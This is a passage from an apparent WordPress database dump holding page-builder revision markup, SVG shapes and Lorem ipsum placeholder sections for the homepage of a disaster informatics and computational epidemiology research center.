d=\"M1069.52,43.37l6.19-1.24,1.31-.45,4-.58,4.89.68c4-1.88,4-1.87,5.69,2.55a30,30,0,0,0,1.2,2.79c3,5.86,3,5.82,9.09,4.29a3.72,3.72,0,0,1,2.5.41c3.12,1.85,6,3.88,4,8.29-.1.22.29.67.43,1l2.85-3c.73,1.58.37,2.94.81,4a30.58,30.58,0,0,0,3,4.62l2.47-2.29c-3.46.83-3.83.5-2.92-2.82a26.61,26.61,0,0,1,1.57-4.47c2.18-4.49.74-6.59-4.32-6.9a8.72,8.72,0,0,1-5.34-2.22c-4.86-5-4.74-5.09-9.11-.07-.12.14-.42.13-1.17.33a57.38,57.38,0,0,0-3.49-6.28,6.85,6.85,0,0,0-3.62-2.76,29,29,0,0,0-7.28-.17,55.42,55.42,0,0,0-6,.93c-2.17.37-4.32,1-6.51,1.12-3.65.3-7.51-.39-10.39,2.76a37.77,37.77,0,0,1,5.49-1.08A22.42,22.42,0,0,1,1069.52,43.37Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.44,10.24l4-.6c2.61,0,5.23,0,7.84,0,1.34,0,3.05.26,3.94-.43,2.59-2,4.75-1.78,6.83.48,1.62,1.76,2.72,1.95,4-.46,1.51-2.85,4.23-3.12,7.28-1.54a6,6,0,0,0,4.36.58c6.13-2.4,12.57-2.23,18.93-2.74,3.46-.56,7-1.81,10.21.74l4.74.62a15.85,15.85,0,0,1,2.84-.56c4.63-.14,9.26-.19,13.88-.27-1.36-.58-2.7-1.6-4.09-1.68C696,4,689.76,4.05,683.55,3.68c-9.12-.54-18.06,0-26.8,2.94-2.41.79-5,1-6-2.06-1.81.4-3.33.78-4.87,1.06-4.51.82-9,1.63-13.55,2.35-.83.13-1.74-.35-2.6-.31-5.24.23-10.47.54-15.7.83.25.56.5,1.13.74,1.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n            <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-215 style-local-22-h27\">\n                    <!---->\n                    <!---->\n                    <h3 class=\"\">Center for Disaster Informatics &amp; Computational Epidemiology</h3>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Enabling Data-Driven Disaster Assessment &amp; Planning\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\"  data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n                    </span>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n            <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n                      <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-02-16 15:44:20','2022-02-16 15:44:20','',22,'https://gsudice.dataconn.net/?p=325',0,'revision','',0),(329,1,'2022-02-16 15:45:12','2022-02-16 15:45:12','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c4\",\"index\":0,\"id\":\"20-c5\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c6\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease &amp; disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c4\",\"index\":1,\"id\":\"20-c7\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c8\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c8\",\"index\":0,\"id\":\"20-c9\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c10\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c8\",\"index\":1,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c12\",\"parentId\":\"20-c3\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c12\",\"index\":0,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c14\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"population disparities<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c12\",\"index\":1,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":272,\"type\":\"content\"}],\"id\":\"20-c2\",\"parentId\":\"20-c1\",\"partialId\":20,\"styleRef\":271,\"type\":\"content\"}],\"id\":\"20-c1\",\"partialId\":20,\"styleRef\":228,\"type\":\"content\"}','','','inherit','closed','closed','','168-revision-v1','','','2022-02-16 15:45:12','2022-02-16 15:45:12','',168,'https://gsudice.dataconn.net/?p=329',0,'revision','',0),(330,1,'2022-02-16 15:45:12','2022-02-16 15:45:12','<div data-colibri-id=\"20-c1\" class=\"style-228 style-local-20-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"20-c2\" id=\"overlappable\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-271 style-local-20-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"20-c3\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c4-outer\">\n            <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c5\" class=\"h-icon style-274 style-local-20-c5 position-relative h-element\">\n                  <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c5-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n                <div\n                  data-colibri-id=\"20-c6\" class=\"h-global-transition-all h-heading style-275 style-local-20-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-275 style-local-20-c6\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">disease &amp; disaster modeling</h5>\n                  </div>\n              </div>\n              <div data-colibri-id=\"20-c7\" class=\"h-text h-text-component style-276 style-local-20-c7 position-relative h-element\">\n                <!---->\n                <!---->\n                <div class=\"\">\n                  <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c8-outer\">\n          <div data-colibri-id=\"20-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c8 position-relative\">\n            <!---->\n            <!---->\n            <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n              <!---->\n              <div data-colibri-id=\"20-c9\" class=\"h-icon style-274 style-local-20-c9 position-relative h-element\">\n                <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c9-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n              <div\n                data-colibri-id=\"20-c10\" class=\"h-global-transition-all h-heading style-275 style-local-20-c10 position-relative h-element\">\n                <!---->\n                <div class=\"h-heading__outer style-275 style-local-20-c10\">\n                  <!---->\n                  <!---->\n                  <h5 class=\"\">data as a service</h5>\n                </div>\n            </div>\n            <div data-colibri-id=\"20-c11\" class=\"h-text h-text-component style-276 style-local-20-c11 position-relative h-element\">\n              <!---->\n              <!---->\n              <div class=\"\">\n                <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\n              </div>\n            </div>\n          </div>\n        </div>\n      